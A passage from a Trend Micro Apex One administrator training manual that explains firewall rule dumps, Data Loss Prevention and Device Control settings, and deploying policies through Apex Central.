only NIC descriptions that start with Intel(R) Pro/100 will satisfy the criteria.

7 Agent Location: Select from the following:


• Internal - Security Agents can connect to the Apex One Server or a configured reference
server
• External - Security Agents cannot connect to the Apex One Server or a configured reference
server
8 Select whether to grant users the privilege to change the firewall security level or edit a
configurable list of exceptions to allow specified types of traffic.
9 Click Save.
Click Apply Profile to Agents. The profile is deployed to the agent identified in the profile. A
message is displayed advising you that the Security Agents are being notified of the new
settings.

10 When the policy is triggered, a notification is displayed on the Agent computer.

© 2019 Trend Micro Inc. Education 239


Lesson 12: Protecting Endpoint Computers Through Traffic Filtering

11 Click the number next to Firewall Violations or Network Viruses to view logging details regarding
the firewall violation.

Note: Firewall log uploads will upload every 4 hours by default. This can be changed in the Web
Management console under Agents > Global Agent Settings > Security Settings > Firewall
Settings.
On the Agent this will appear in the Windows Registry under:
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TrendMicro\PC-cillinNTCorp\
CurrentVersion\PFW\ActiveLogReportFrequency

Viewing Firewall Rules


Administrators can view the rules currently in effect on an Security Agent by instructing the Agent
to dump its firewall logs. By default, the dump of the firewall rules is stored in a text file called
!PfwDump.txt created in the Security Agent folder.

To dump firewall logs, complete the following steps:


1 Open the Windows Command Prompt and navigate to the Security Agent folder, for example:
...\Trend Micro\Security Agent
2 Type the following command:
tmpfw dump

240 © 2019 Trend Micro Inc. Education


Lesson 12: Protecting Endpoint Computers Through Traffic Filtering

3 Locate the !PfwDump.txt file.

The following example shows the access rule-set portion of the dump.
========== CFW Rules ===============

[65535]-[10]: ACCESS, ANY, IPV4, UDP, , , , 67:68, ACCEPT,

[65535]-[20]: ACCESS, ANY, IPV6, UDP, , , , 546:547, ACCEPT,

. . .

[2]-[10205]: ACCESS, ANY, IPV4, TCP, 172.16.5.105, ! 172.16.5.105, , 63204, ACCEPT, 2:0:TrustZone

. . .

[1]-[65000]: ACCESS, ANY, IPV4, ANY, , , , , DROP, 8:0:Anchor

The following diagram shows the different parts of an rule dump file entry.

Access rule Firewall rule Source IP Source port


type number type Direction address Action

[ 2]-[10205]:ACCESS,ANY,IPV4,TCP,172.18.5.105,!172.18.5.105, ,63204,ACCEPT,2:0:TrustZone

Destination Destination Rule


L3 Protocol L4 Protocol IP or range port description

The following table explains each part of the rule shown:

Rule part Description


Access rule type number This identifies the type of access rule.
This identifies the type of rule. The ACCESS value in the sample above
Firewall rule type indicates that it is an access rule.

Direction Specifies the direction of a packet relative to the Security Agent host.
Valid values are: IN, OUT, and ANY.
This refers to the Network layer protocol used with the packet. Valid
L3 Protocol values are IPv4, IPv6, and Any. In the example above, the rule refers
to IPv4 traffic.
This refers to the Transport layer protocol used with the packet. In the
L4 Protocol
example above, the rule applies to TCP-based traffic.
This is the IP address of the origin of the packet. In the example above,
Source IP address
the source is 172.18.5.105.
This is the machine to which the packet is sent. Note the ! used in the
Destination IP address or
example above. This character represents not, therefore, the rule in
range
the sample applied to any packet that was not sent to the source itself.
This indicates the port through which the packet was sent. In the
Source port
example above, a source port was not specified.

Destination port This indicates the port at which an application at the destination is
listening for the packet.
This indicates the action that the firewall takes if a packet matches
Action
this rule.
Rule description This is a description of the rule's purpose.

© 2019 Trend Micro Inc. Education 241


Lesson 12: Protecting Endpoint Computers Through Traffic Filtering

242 © 2019 Trend Micro Inc. Education


Lesson 13: Preventing Data Leaks on Endpoint Computers

Lesson 13: Preventing Data Leaks on


Endpoint Computers

Lesson Objectives:

After completing this lesson, participants will be able to:


• Install the Data Protection Plug-in
• Configure Data Protection templates and policies
• Configure Device Control

Apex One uses Data Loss Prevention to protect Agents from the risk of data loss or leakage. Data Loss
Prevention safeguards an organization’s sensitive data against accidental or deliberate leakage. Data
Loss Prevention allows you to:
• Identify the sensitive information that requires protection using data identifiers
• Create policies that limit or prevent the transmission of digital assets through common
transmission channels, such as email and external devices
• Enforce compliance to established privacy standards

Data Loss Prevention in Apex One provides the following features:


• Digital Asset Control
• Device Control

Data Loss Prevention


The Security Agent is responsible for the monitoring and detection of digital assets at the endpoint. The
Data Loss Prevention Agent communicates with the Apex One Server and acquires the definition of
digital assets, compliance templates, company policies, data discovery tasks and other system
configurations. Using these definitions, the Agent can monitor and protect digital assets on the endpoint.
If sensitive information is detected, it then performs the actions specified in the policies and notifies the
server about the violation.

The Security Agent performs the following tasks:


• Downloads company policies using ActiveUpdate
• Scans transferred data and takes action on this data depending on company policies
• Reports security violations to the server

It keeps a connection with the server and performs the monitoring and protection of digital assets based
on policies received from the Apex One Server.

The main Data Loss Prevention Agent configuration file called dsa.pro is stored in the following folder:
…\Security Agent\dlplite\System32\

© 2019 Trend Micro Inc. Education 243


Lesson 13: Preventing Data Leaks on Endpoint Computers

This configuration file contains the deployment-specific configuration settings for the Agent. The server
transfers the following data and configuration settings to the Data Loss Prevention Agent:
• A portion of the system configuration settings that affect the Agent, such as scanning limits, is
stored in the dsa.cfg file in the following folder:
…\Security Agent\dlplite\System32\dgAgent
• Company Policies and other digital asset configurations are stored in the dsa.pol file in the
following folder:
…\Security Agent\dlplite\System32\dgAgent

Installing Data Protection


Data Loss Prevention and Device Control are native Apex One features but are licensed separately.
After you install the Apex One Server, these features are available but are not yet functional and
cannot be deployed to Agents until the plug-in has been incorporated into the Apex One Server. You
can then activate the Data Protection license to enable the features.

Apex One Data Protection installation and activation in an on-premise deployment are performed
from the Plug-in Manager and gets deployed to Agents as soon as the Data Loss Prevention settings
are enabled.
1 In the Apex One Web Management console, click the Plug-ins menu. In the Apex One Data
Protection section, click Download.

2 Confirm the download of Apex One Data Protection and click OK to proceed.

244 © 2019 Trend Micro Inc. Education


Lesson 13: Preventing Data Leaks on Endpoint Computers

3 After the download is complete, click Install Now.

4 When prompted, click Agree to accept the license agreement.

5 Once installed, click Manage Program.

© 2019 Trend Micro Inc. Education 245


Lesson 13: Preventing Data Leaks on Endpoint Computers

6 Type the Data Protection Activation Code and click Save.

7 A new menu item for Data Loss Prevention become available in the Web Management console.

246 © 2019 Trend Micro Inc. Education


Lesson 13: Preventing Data Leaks on Endpoint Computers

Digital Asset Control


Digital assets are data and files that an organization must protect against unauthorized transmission.
Examples of digital assets are:
• Confidential documents
• Customers private information

Data Identifiers
Administrators define digital assets through:
• Expressions
• File Attributes
• Keyword Lists

Expressions

Expressions define data that has a certain structure. For example, credit card numbers that
typically have 16 digits and appear in the format nnnn-nnnn-nnnn-nnnn. Other expressions
may be SWIFT or IBAN number, social security numbers (by country), email addresses, postal
codes etc. Administrators can use predefined and customized expressions.

Data Loss Prevention comes with a set of predefined expressions. These expressions cannot be
modified or deleted. Data Loss Prevention verifies these expressions using pattern matching and
mathematical equations. After Data Loss Prevention matches potentially sensitive data with an
expression, the data may also undergo additional verification checks.

© 2019 Trend Micro Inc. Education 247


Lesson 13: Preventing Data Leaks on Endpoint Computers

File Attributes

File attributes are file properties such as file type and file size. By themselves, file attributes are
poor identifiers of sensitive files, but combining file attributes with other Data Loss Prevention
identifiers can result in a more targeted detection of sensitive files.

Data Loss Prevention comes with a predefined file attributes list. This list cannot be modified or
deleted. The list has its own built-in conditions that determine if the template should trigger a
policy violation.

Keyword Lists

keyword lists include special words or phrases. You can add related keywords to a keyword list
to identify specific types of data. For example, prognosis, blood type, vaccination, and physician
are keywords that may appear in a medical certificate. If you want to prevent the transmission of
medical certificate files, you can use these keywords in a Data Loss Prevention policy and then
configure Data Loss Prevention to block files containing these keywords.Each keyword list
contains a condition that requires a certain number of keywords be present in a document
before the list triggers a violation. The number of keywords condition contains the following
values:
• All: All of the keywords in the list must be present in the document.
• Any: Any one of the keywords in the list must be present in the document.
• Specific number: There must be at least the specified number of keywords in the document.
If there are more keywords in the document than the number specified, Data Loss
Prevention triggers a violation.

248 © 2019 Trend Micro Inc. Education


Lesson 13: Preventing Data Leaks on Endpoint Computers

Some of the lists contain a distance condition to determine if a violation is present. Distance
refers to the amount of characters between the first character of one keyword and the first
character of another keyword.

Data Loss Prevention comes with a set of predefined keyword lists. These keyword lists cannot
be modified or deleted. Each list has its own built-in conditions that determine if the template
should trigger a policy violation.

Data Loss Prevention Templates


A Data Loss Prevention policy contains one or more templates. A Data Loss Prevention template
combines data identifiers and logical operators (And, Or, Except) to form condition statements. Only
files or data that satisfy a certain condition statement will be subject to a Data Loss Prevention
policy.

For example, a file must be a Microsoft Word file (file attribute) AND must contain certain legal terms
(keywords) AND must contain ID numbers (expressions) for it to be subject to the Employment
Contracts policy. This policy allows Human Resources personnel to transmit the file through printing
so that the printed copy can be signed by an employee. Transmission through all other possible
channels, such as email, is blocked. If a file or data matches the definition on more than one
template, the higher priority template applies.

© 2019 Trend Micro Inc. Education 249


Lesson 13: Preventing Data Leaks on Endpoint Computers

Data Loss Prevention comes with the following set of predefined templates that you can use to
comply with various regulatory standards, for example:
• GLBA: Gramm-Leach-Billey Act
• HIPAA: Health Insurance Portability and Accountability Act
• PCI-DSS: Payment Card Industry Data Security Standard
• SB-1386: US Senate Bill 1386
• US PII: United States Personally Identifiable Information

Note: These templates cannot be modified or deleted.

You can also create your own templates if you have configured data identifiers. A template combines
data identifiers and logical operators (And, Or, Except) to form condition statements.

Data Loss Prevention Policies


Administrators can limit or prevent transmission of digital assets by creating policies. Apex One
evaluates a file or data against the rules defined in the Data Loss Prevention policies. The policies
determine files or data that requires protection from unauthorized transmission and the action that
Apex One performs after detecting a transmission.

Administrators can configure policies for internal and external Security Agents. Typically, a stricter
policy is configured for external Agents. The policies can be enforced for specific Agent groups or
individual Agents.

250 © 2019 Trend Micro Inc. Education


Lesson 13: Preventing Data Leaks on Endpoint Computers

Policies are created by configuring and selecting the following:


• Template: Combines data expressions, keywords and file attributes (as described earlier).
• Channel: Channels are methods that transmit sensitive information. Data Loss Prevention
supports popular transmission channels, such as email, FTP, HTTP/S, IM applications, SMB
protocol, and webmail.
• Action: Data Loss Prevention performs one or several actions when it detects an attempt to
transmit sensitive information through any of the channels. Different actions can be
selected when there is a match, like blocking the file, or logging the event. Additional
settings can be configured like displaying a notification message to the user or recording the
data (makes a copy of the file for forensic/auditing purposes).

Note: Recording sensitive data may consume large amounts of hard disk space. It is highly
recommended that you only choose this option for highly sensitive information.

• Exception: Exceptions act as overrides to the configured Data Loss Prevention rules.

Data Loss Prevention Policies can be created by selecting the domain, group or Agents receiving the
policy in the Agent Management list and clicking Settings > DLP Settings from the right-mouse
button menu. Click the policies link to begin the policy configuration.

Configuration steps include:


1 Enabling Data Loss Prevention and adding new rule.

© 2019 Trend Micro Inc. Education 251


Lesson 13: Preventing Data Leaks on Endpoint Computers

2 Selecting the template to apply to the policy.

252 © 2019 Trend Micro Inc. Education


Lesson 13: Preventing Data Leaks on Endpoint Computers

3 Selecting the channel that will be monitored by the policy.

4 Selecting the action that will be triggered by the policy.

© 2019 Trend Micro Inc. Education 253


Lesson 13: Preventing Data Leaks on Endpoint Computers

When User Justification is enabled, the end user will be able to transfer the file even though the
action is set to Block, but they must select one of the listed reasons for the transfer before it
completes the operation.

The list of justification reasons can be changed by editing the ofcscan.ini file on the Apex
One Server and modifying the entries listed for DlpUserJustificationItem.

Detecting Digital Assets


The Data Loss Prevention Agent creates a Boolean expression based on the raw policy contents. The
Policy Engine also re-organizes the condition rules (defined using compliance templates) and creates
a separate Boolean expression tree for the condition. The data being analyzed is compared against
this expression using the different match engines. This means that a policy only matches if its target,
channel and condition are all satisfied. Otherwise, no action is enforced on the data.

254 © 2019 Trend Micro Inc. Education


Lesson 13: Preventing Data Leaks on Endpoint Computers

Data Loss Prevention Logging


When a violation is detected, the Real-Time Scan Service parses and writes to the violation log.

Forensic Folder and DLP Database


After a Data Loss Prevention incident occurs, Apex One logs the incident details in a specialized
forensic database. Apex One also creates an encrypted file containing a copy of the sensitive data
which triggered the incident and generates a hash value for verification purposes and to ensure the
integrity of the sensitive data. Apex One creates the encrypted forensic files on the Agent machine
and then uploads the files to a specified location on the server.

Since the encrypted forensic files contain highly sensitive data and administrators should exercise
caution when granting access to these files.

Apex One integrates with Apex Central to provide Apex Central users with the DLP Incident
Reviewer or DLP Compliance Officer roles the ability to access the data within the encrypted files.
Administrators can change the location and deletion schedule of the forensic folder, and the
maximum size of files that Agents upload by modifying Apex One’s *.ini files.

Note: Changing the location of the forensic folder after logging Data Loss Prevention incidents can
cause a disconnect between the database data and the location of existing forensic files. Trend
Micro recommends manually migrating any existing forensic files to the new forensic folder
after modifying the forensic folder location.

Device Control
Device Control functionality as part of Data Loss Prevention provides a way to:
• Limit the access of an endpoint or a group of endpoints to specific devices
• Define an exception list (Approved Devices) for USB devices via USB granular support

© 2019 Trend Micro Inc. Education 255


Lesson 13: Preventing Data Leaks on Endpoint Computers

Settings for this feature are stored on the Apex One Server in the ofcscan.ini and the database.
Settings for this feature are stored on the Agent in the following:
…\Security Agent\dlplite\dc.xml, dc_in.xml, and dc_out.xml

Devices that are supported are shown below.

Device Type Description


Apex One monitors data recorded to physical and virtual CD/DVD
CD/DVD devices (for example, Daemon Tools, PowerISO)
COM and LPT including all devices under Ports category in Device
Ports
Manager
Virtual Machine Floppy Driver. Disk controllers (generally, for
Floppy disk controllers drives A/B)
Removable disks such as USB drives, Flash drives, storage cards,
Removable disk drives Hubs etc.
NOTE: This option has an exception list discussed below.
IEEE 1394 interface on devices
TIP: Also referred to as Firewire, it is a high-speed, serial input/
IEEE 1394 Bus host controllers
output bus for computer peripherals and consumer electronics,
capable of transfer speeds of up to 400 megabits per second
Imaging devices Camera, scanners
Devices that can send and receive infrared data such as infrared
Infrared devices
transceivers and adapters
Modems Network interface
Peripheral interface for laptops
PCMCIA adapters TIP: PCMCIA stands for Personal Computer Memory Card
International Association
Print Screen key PrtSc or Print Screen key on keyboard
Wireless NICs Wireless Network Cards of Trend Micro tested mobile devices
Bluetooth Bluetooth adapters

Note: Apex One includes a native Device Control feature that regulates access to commonly used
devices such as USB storage devices. Device Control included as part of the Data Protection
module expands the range of monitored devices.

256 © 2019 Trend Micro Inc. Education


Lesson 13: Preventing Data Leaks on Endpoint Computers

To configure Device Control Setting, select a domain, group or device under Agent Management and
click Settings > Device Control Settings:

Permissions for Mobile Devices and Non-Storage Devices include:

Permissions Files on the device Incoming files


Permitted operations: Save, Move,
Allow Permitted operations: Copy, Move, Copy
Open, Save, Delete, Execute Files can be saved, moved, and copied
to the device.
Block Prohibited operations: All operations
(available after The device and the files it contains are Prohibited operations: Save, Move,
installing Data not visible to the user (for example, Copy
Protection) from Windows Explorer).

© 2019 Trend Micro Inc. Education 257


Lesson 13: Preventing Data Leaks on Endpoint Computers

Permissions for Storage Devices include:

Permissions Files on the device Incoming files


Permitted operations: Save, Move,
Permitted operations: Copy, Move, Copy
Full access
Open, Save, Delete, Execute Files can be saved, moved, and copied
to the device.
Permitted operations: Copy, Move,
Open, Save, Delete Permitted operations: Save, Move,
Modify
Copy
Prohibited operations: Execute
Permitted operations: Copy, Open,
Execute
Prohibited operations: Save, Move,
Read and execute
Copy
Prohibited operations: Save, Move,
Delete
Permitted operations: Copy, Open
Read Prohibited operations: Save, Move,
Prohibited operations: Save, Move, Copy
Delete, Execute
Prohibited operations: All operations
List device content The device and the files it contains are Prohibited operations: Save, Move,
only visible to the user (for example, from Copy
Windows Explorer).
Block Prohibited operations: All operations
(available after The device and the files it contains are Prohibited operations: Save, Move,
installing Data not visible to the user (for example, Copy
Protection) from Windows Explorer).

Note: File-based scanning complements, and may override, the device permissions. For example, if the
permission allows a file to be opened but the Security Agent detects that the file is infected with
malware, a specific scan action is performed on the file to eliminate the malware. If the scan
action is Clean, the file opens after it is cleaned. However, if the scan action is Delete, the file is
deleted.

USB Exception List


Removable disk drives support exemptions. To define USB disk drives, the Administrator must
provide the following:
• Vendor Disk: drive’s vendor name
• Model: Four bits product number
• Serial Number: Another device descriptor in HEX format

Getting these details is not always a straight-forward process. Some manufacturers even have their
own way of displaying this information. To address this issue, Device Control provides an Auto-
Detect Assistance tool (listDeviceInfo.exe).

258 © 2019 Trend Micro Inc. Education


Lesson 13: Preventing Data Leaks on Endpoint Computers

This tool searches the local system for all connected USB disks and lists the vendor, model and serial
number of each device as shown in the example below. The Administrator can then refer to this
output to determine the information that needs to be provided in the exception list. A maximum of
200 USB disks can be exempted.

Once the details of the USB drive are known, set the permissions for the USB device to Block and
click Approved Devices. Complete the Approved devices list with the details retrieve from
listDeviceInfo.exe.

Note: By default, Device Access Control violations will be collected for a period of 1 hour, then uploaded
to the Apex One server. In environments with many Agents with strict controls, this could
generate a large increase in the amount of logs sent to the server.
On the Agent this value will appear in the Registry under:
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TrendMicro\PC-cillinNTCorp\
CurrentVersion\AEGIS\SendLogPeriod

© 2019 Trend Micro Inc. Education 259


Lesson 13: Preventing Data Leaks on Endpoint Computers

260 © 2019 Trend Micro Inc. Education


Lesson 14: Deploying Policies Through Trend Micro Apex Central

Lesson 14: Deploying Policies Through


Trend Micro Apex Central

Lesson Objectives:

After completing this lesson, participants will be able to:


• Register Apex Central in Apex One
• Configure Apex One policies in Apex Central for deployment to endpoints

Apex Central
Apex Central (previously known as Control Manager) provides a centralized console to manage, monitor,
and report across multiple layers of security in all your Trend Micro product deployments.

Customizable data displays provide the visibility and situational awareness for administrators to rapidly
assess status, identify threats, and respond to incidents. Administration can be streamlined to achieve
more consistent policy enforcement with single-click deployment of data protection policies across
endpoint, messaging, and gateway solutions.

User-based visibility shows what is happening across all endpoints owned by users, enabling
administrators to review policy status and make changes across all user devices.

In the event of a threat outbreak, administrators have central access point for complete visibility of an
environment to track how threats have spread.

With a better understanding of security events, it becomes easier to prevent them from reoccurring.
Direct links to Trend Micro Threat Connect database provides access to actionable threat intelligence,
which allows administrators to explore the complex relationships between malware instances, creators,
and deployment methods. Apex Central is then able to apply policy on how these suspicious objects
should be treated.

Apex One sends and can retrieve suspicious objects from Apex Central. Additionally, Apex One can
leverage Scan Actions (for example Log or Block) from Apex Central.

© 2019 Trend Micro Inc. Education 261


Lesson 14: Deploying Policies Through Trend Micro Apex Central

The Dashboard in the Apex Central console provides the status summary for the entire Apex Central
network.

Apex Central Services


The following services are installed as part of Apex Central.

Component Description
Trend Micro Apex Central
This component launches and stops other Apex Central core
Service processes.
(ProcessManager.exe)
Trend Micro Management Provides the Apex Central Web Management console and manages the
Infrastructure Product Directory. Also manages the Message Routing Framework
(cm.exe) (the Communicator) which serves as the communications backbone
for Apex Central. This component of the Trend Micro Infrastructure
handles all communication between the Apex Central Server and
managed products for all older Control Manager agents. They interact
with older Control Manager agents to communicate with managed
products.

262 © 2019 Trend Micro Inc. Education


Lesson 14: Deploying Policies Through Trend Micro Apex Central

Apex Central Management Modes


Apex Central can be deployed in a few different management modes, including a pure on-premise, cloud
or hybrid deployment.

On-premise Management Mode


In on-premise management mode, an Apex Central Server is deployed to provide management and
policy deployment capabilities to Apex One and Apex One (Mac) Servers. In this type of deployment,
the Apex Central and Apex One Servers are installed on premise.

Apex Central

Apex One/Apex One (Mac)

Security Agents

Cloud Management Mode


In cloud management mode, an instance of Apex Central as a Service is deployed to provide
management and policy deployment capabilities to instances of Apex One and Apex One (Mac) as a
Service.

Apex Central
as a Service

Apex One/Apex One (Mac)


as a Service

Security Agents

© 2019 Trend Micro Inc. Education 263


Lesson 14: Deploying Policies Through Trend Micro Apex Central

Hybrid Mode
This management mode uses a combination of on-premise and cloud “as a service” servers. In the
example displayed here, multiple instances of Apex One as a Service as well as an on-premise
deployment of Apex One are registered to an on-premise Apex Central Server. This on-premise Apex
Central can manage other Trend Micro products, like Deep Discovery Analyzer, Deep Security, Trend
Micro Scan Mail for Microsoft Exchange and others.

This type of installation requires the Remote Connection Tool in the DMZ to allow the SaaS product
consoles to register to the on-premise Apex Central Server. The Remote Connection Tool will run as
a service named SmartRelay (Smart Relay Service).

Apex One/Apex One (Mac)


Deep Discovery as a Service
Analyzer
Security Agents

Apex Central
Remote Connection
Tool in DMZ
Central US

Other Trend
Micro Products

Apex One/Apex One (Mac)

Apex One/Apex One (Mac)


as a Service

Security Agents
Security Agents
Western Europe

On Premise Cloud

The Remote Connection Tool can be downloaded, along with details on its use, from the Trend Micro
Customer Success Web site at:
https://success.trendmicro.com/solution/1118614-setting-up-apex-one-as-a-
service-remote-connection-to-control-manager-tmcm.

264 © 2019 Trend Micro Inc. Education


Lesson 14: Deploying Policies Through Trend Micro Apex Central

Managing Apex One Policies in Apex Central


Policies are used to enforce product settings on managed products. In Apex Central, policies for
endpoints can be managed centrally from the Apex Central Web Management console. Administrators
can set policies on endpoints identified using different criteria within Apex Central.

Policy Management is a powerful feature in Apex Central as it allows administrators to enforce settings
on specific products and specific targets from a single console. Administrators can assign a policy to a
large number of endpoints which sit across different servers and even across different domains.

Administrators can group endpoints from the Apex Central Web Management console instead of using
the traditional Apex One server-domain structure product tree to manage endpoints. They can also
easily check all deployment results from the Policy list, Policy Status widget and Data Leak Prevention
violation widget and they can troubleshoot according to policy status of each endpoint returned by
product.

To manage Apex One policies through Apex Central in an on-premise installation, an administrative user
would complete the following steps:
1 Connect Apex Central and Apex One.
2 Create a user account for the Apex Central administrator in Apex One.
3 Add Apex One to the Apex Central Product Directory.
4 Select the Apex One Security Agent as the product on which you will configure policy settings.
5 Select the endpoints on which to assign and deploy the policy.
6 Create a policy template by identifying the policy settings required.
7 Deploy the policy.

When a policy is created, administrators are able to specify the policy targets and the settings to be
applied. However, as the policy can only cover endpoints where the Apex Central administrative user has
access, it is important to plan who will create the policy. It is also possible for multiple administrators to
have the same policy settings but different targets because they have only access to specific endpoints
and entities.

Connecting Apex One and Apex Central


Communication between Apex One and Apex Central is configured through the Apex One Web
Management console.
1 On the Apex Central server, locate the digital certificate created during the setup of the server.
The certificate file is called TMCM_CA_Cert.pem and is located in the following folder on the
Apex Central Server:
C:\Program Files (x86)\Trend Micro\Control Manager\Certificate\CA\
Copy this file to a location accessible by Apex One.
2 Log into the Apex One Web Management console and click Administration > Settings > Apex
Central.
3 In the Apex Central Settings window, the Connection Status should be displayed as Not
connected.

© 2019 Trend Micro Inc. Education 265


Lesson 14: Deploying Policies Through Trend Micro Apex Central

Complete the details of the Apex Central Server as follows:

• Entity display name: Type a name for the Apex One Server. This is the name used to display
the Apex One Server in Apex Central.
• Server FQDN or IP address: Type the server fully qualified domain name or IP address.
• Port: Accept the default port of 443
• Apex Central Certificate: Click Browse and locate the TMCM_CA_Cert.pem certificate file
copied over from the Apex central Server
4 Click Test connection. A connection was successful message should be displayed. Click OK.

5 Click Register. The connection status is updated.

266 © 2019 Trend Micro Inc. Education


Lesson 14: Deploying Policies Through Trend Micro Apex Central

Creating an Apex Central User Account


The Apex Central administrator must have an account in Apex One with the appropriate
administrative permissions. This account will enable single sign-on into Apex One from Apex Central.
1 Log into the Apex One Web Management console and click Administration > Account
Management > User Accounts.
2 Click Add to create a new account. Complete the details for the account as follows:

• Select Role: Select Administrator (Built-in) from the list


• User name: Type the name of the Apex Central administrator as identified during the Apex
Central setup
• Password: Type the password for the Apex Central administrator as identified during the
Apex Central setup
Click Next.

© 2019 Trend Micro Inc. Education 267


Lesson 14: Deploying Policies Through Trend Micro Apex Central

3 Select the Agent Tree Scope to define the branches of the Agent Tree this administrator will
have control over. The top branch of Apex One Server is selected by default, click Next.

4 To enable the Apex One items that the Apex Central account will have permissions to control,
click the Apex One Server at the top of the list and click Finish.

268 © 2019 Trend Micro Inc. Education


Lesson 14: Deploying Policies Through Trend Micro Apex Central

5 The new user account is displayed.

Adding Apex One to the Apex Central Product Directory


New products added to Apex Central are assigned to a folder in the Product Directory called New
Entity by default. The product must be reassigned to another folder to enable management through
Apex Central and assign the appropriate management permissions.
1 In the Apex Central Web Management console, click Directories > Products and click Directory
Management.

© 2019 Trend Micro Inc. Education 269


Lesson 14: Deploying Policies Through Trend Micro Apex Central

2 Click Local Folder, and click Add Folder.

3 Type a name for a new folder (or directory), for example, Trend Micro Servers and click
Save. Click OK to confirm the creation of the directory.

4 Expand the New Entity folder. Drag the Apex One Server device from New Entity folder to the
newly created folder.

When prompted, click OK to acknowledge the move.

270 © 2019 Trend Micro Inc. Education


Lesson 14: Deploying Policies Through Trend Micro Apex Central

The Apex One Server should be displayed in the Trend Micro Servers folder.

Selecting the Destination Product


Apex Central can deploy policy settings to a variety of Trend Micro products. The Apex One Security
Agent can be selected as the destination product to receive policy attributes for protecting endpoint
computers.

In the Apex Central Web Management console, click Policies > Policy Management. In the Product list,
select Apex One Security Agent. To create a policy for this product, click Create or Create one now.

© 2019 Trend Micro Inc. Education 271


Lesson 14: Deploying Policies Through Trend Micro Apex Central

Identifying Policy Targets


Administrators can manually select the target endpoint or use a filter to automatically assign
targets to their policies. The target selection can be dynamic filtering or static binding and can be
selected by IP subnet, operating system, naming rules in the Apex Central product tree or Active
Directory organizations units.

None (Draft only)


This option provides a way to save a policy definition without applying it to any targets. This
allows an administrative user to fine tune settings and then switch over to either a Specified
or Filtered policy that can be put into actual use. Drafts have the lowest priority and always
stay in the bottom of the Policy List.

Filter by Criteria

Filter by Criteria is useful for deploying standard settings to a group of targets across the
organization. The filter uses known characteristics for devices, including operating system,
location, IP address or other metrics for the devices. If the specified criteria matches, Apex
Central applies the corresponding policy. If the matching characteristics change over time, then
a different policy gets deployed.

272 © 2019 Trend Micro Inc. Education


Lesson 14: Deploying Policies Through Trend Micro Apex Central

Specify Target(s)
This option is useful for deploying settings only to specific target devices. This method uses
a static assignment, meaning once a policy is assigned to a selected targets, the assigned
policy will never change or be re-evaluated. This policy also has the highest priority and will
always apply. For a server in an environment where the security policy MUST be the same
policy and never change, use Specify Target(s) to deploy a policy that is locked to the
specified device(s).

In the list of endpoints, click to select the appropriate endpoints and click Add Selected
Targets. Click OK.
When defining policy targets, certain limitations must be kept in mind:
• Administrative users cannot apply a policy to a target which is listed under the New
Entity folder in the Product Directory. Administrative users cannot browse or search for
a target under this folder.
The target must be moved from the New Entity folder to another folder before creating
the policy.
• Apex Central policy assignments are not incremental; all settings deployed by the policy
will overwrite any existing settings that are currently configured on the endpoint.
• A specified policy takes precedence over a filtered policy. In the case where a server or
endpoint matches multiple specified policies, the latest policy gets applied to the target.
However, if a server or endpoint matches multiple filtered policies, it takes the first
policy that it matched based on the order of priority. The priority order can be
rearranged to meet the administrative requirement. Only one policy is applied to a
server or endpoint.
For example, if Web Reputation must always be disabled for all developer workstations
that are located on an isolated and secure subnet within an environment, administrative
users can deploy a policy using Specify Targets (hard coded policy) that has Web
Reputation turned OFF. Then, Filter by Criteria could be used to assign an additional
policy with Web Reputation enabled to only Windows platform users.

© 2019 Trend Micro Inc. Education 273


Lesson 14: Deploying Policies Through Trend Micro Apex Central

Defining Policy Settings


Once Apex Central deploys a policy to the target endpoints, the settings defined in the policy will
overwrite any settings configured for these targets by the Apex One Server. Apex Central re-
enforces the policy settings in the targets every 24 hours.

Although local administrators can make changes to the settings from the Apex One Web
Management console, these changes are overwritten every time Apex Central re-enforces the policy
settings. For certain product settings, Apex Central needs to obtain specific setting options from the
managed products. If administrators select multiple targets for a policy, Apex Central can only
obtain the setting options from the first selected target. To ensure a successful policy deployment,
make sure the product settings are synchronized across the targets.

274 © 2019 Trend Micro Inc. Education


Lesson 14: Deploying Policies Through Trend Micro Apex Central

Deploying the Policy


Once the policy settings are configured and the target selected, click Deploy. The Apex One policy
defined in the Apex Central Web Management console gets saved in the Apex One database and
deployed to selected target products. The policy will display in the Policy Management list as
Pending until it is applied on the endpoint. It takes several minutes for the policy to be applied to the
endpoint.

Once applied, the endpoint will display with a status of Deployed.

© 2019 Trend Micro Inc. Education 275


Lesson 14: Deploying Policies Through Trend Micro Apex Central

Policy Inheritance
Policy inheritance is useful in deployments with several Apex One Servers and where an Apex Central
administrative user manages global Apex One policies, and regional administrators defines local or
regional policies requiring more specific settings.

Click to select a policy in the list and click Inherit Settings.

Configure the child policy settings in the policy to be inherited, customized, or extended by child policies.

Inherit From Parent


With this method, an Apex Central administrative user creating a child policy cannot change the
settings configured on the parent. For example, if the parent policy excludes PDF files from being
scanned during a Manual Scan, the administrative user cannot modify this setting in a child policy.

276 © 2019 Trend Micro Inc. Education


Lesson 14: Deploying Policies Through Trend Micro Apex Central

Are Customizable
With this method, an Apex Central administrative user creating a child policy can modify the
settings. For example, if a Scheduled Scan configured in the parent policy runs weekly and is
customizable, and administrative user can modify the schedule in the child policy to run the scan
daily.

Extend from parent


With this method, an Apex Central administrative user creating the child policy can add to the items
in the parent policy. For example, if the parent policy excludes 20 file names from being scanned
during a Manual Scan, the administrator can add 10 more file names that are deemed safe and
trustworthy.

Data Discovery Policies


Apex Central integration with Data Loss Prevention allows administrators to manage and deploy Data
Loss Prevention through Policy Management from the Apex Central Web Management console.

Data Discovery
In Apex Central and Apex One, Data Loss Prevention integration includes the ability to also protect
data that is at rest. This allows Apex Central to scan file storage areas to identify where sensitive
content is located. For example, it can used to scan endpoints and identify documents containing
credit card number information. Policies can dictate that if the endpoint is not authorized to store
this type of data, the file must be encrypted.

Data Discovery tasks can be set up and scheduled to run on Security Agents. The schedule details is
set as part of the policy setting. Additionally, sensitive files can be encrypted with a password or
user/group key if Trend Micro File Encryption is installed. Also note that a Data Discovery task can
resume if the scan service was stopped before the task completed and if the policy is unchanged, the
Data Discovery task can perform an incremental scan.

Data Discovery Policy Management


Data Discovery policies search databases, endpoints and document management systems for the
presence of sensitive information. Data Discovery widgets display data loss prevention compliance
with an enterprise's policy. Using Data Discovery policies and widgets administrators can then
perform remediation actions on their network.

© 2019 Trend Micro Inc. Education 277


Lesson 14: Deploying Policies Through Trend Micro Apex Central

1 In the Apex Central Web Management console, click Policies > Policy Management. Select Apex
One Data Loss Prevention from the Product list.
Click Create or Create one now to create a new policy.

